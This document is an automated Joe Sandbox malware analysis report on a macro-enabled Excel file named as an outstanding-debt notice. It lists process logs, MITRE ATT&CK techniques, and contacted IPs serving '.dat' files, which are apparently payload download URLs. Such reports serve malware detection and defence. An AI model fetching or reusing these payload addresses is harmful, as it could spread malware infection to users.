Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-1636503299-05042021.xlsm0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
http://45.153.229.23/44313,6048108796.dat5%VirustotalBrowse
http://45.153.229.23/44313,6048108796.dat0%Avira URL Cloudsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://5.34.179.36/44313,6048108796.dat3%VirustotalBrowse
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.153.229.23/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://5.34.179.36/44313,6048108796.datfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
    high
    https://login.microsoftonline.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
      high
      https://shell.suite.office.com:144323A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
          high
          https://autodiscover-s.outlook.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
              high
              https://cdn.entity.23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                    high
                    https://powerlift.acompli.net23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v123A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                      high
                      https://cortana.ai23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                high
                                https://api.aadrm.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                      high
                                      https://cr.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                            high
                                            https://graph.ppe.windows.net23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                            high
                                                            https://graph.windows.net23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                high
                                                                                                https://api.office.net23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v223A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices23A21570-D324-4D14-8714-5F35806F5DD6.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.211.91.81
                                                                                                                                                unknownUkraine
                                                                                                                                                206638HOSTFORYUAfalse
                                                                                                                                                5.34.179.36
                                                                                                                                                unknownUkraine
                                                                                                                                                204957GREENFLOID-ASUAfalse
                                                                                                                                                45.153.229.23
                                                                                                                                                unknownRussian Federation
                                                                                                                                                25229VOLIA-ASUAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404076
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:17:36:00
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 48s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:Outstanding-Debt-1636503299-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:28
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/9@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
